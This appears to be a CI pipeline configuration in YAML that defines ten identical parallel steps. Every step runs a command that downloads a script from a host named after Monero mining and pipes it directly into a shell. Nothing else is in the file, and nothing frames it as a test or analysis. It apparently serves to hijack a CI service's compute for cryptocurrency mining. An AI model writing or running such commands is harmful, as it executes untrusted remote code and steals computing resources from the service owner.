---
  - 
    type: "parallel"
    steps: 
      - 
        service: "m"
        command: "sh -c 'curl mine-monero.cf | sh'"
      - 
        service: "m"
        command: "sh -c 'curl mine-monero.cf | sh'"
      - 
        service: "m"
        command: "sh -c 'curl mine-monero.cf | sh'"
      - 
        service: "m"
        command: "sh -c 'curl mine-monero.cf | sh'"
      - 
        service: "m"
        command: "sh -c 'curl mine-monero.cf | sh'"
      - 
        service: "m"
        command: "sh -c 'curl mine-monero.cf | sh'"
      - 
        service: "m"
        command: "sh -c 'curl mine-monero.cf | sh'"
      - 
        service: "m"
        command: "sh -c 'curl mine-monero.cf | sh'"
      - 
        service: "m"
        command: "sh -c 'curl mine-monero.cf | sh'"
      - 
        service: "m"
        command: "sh -c 'curl mine-monero.cf | sh'"
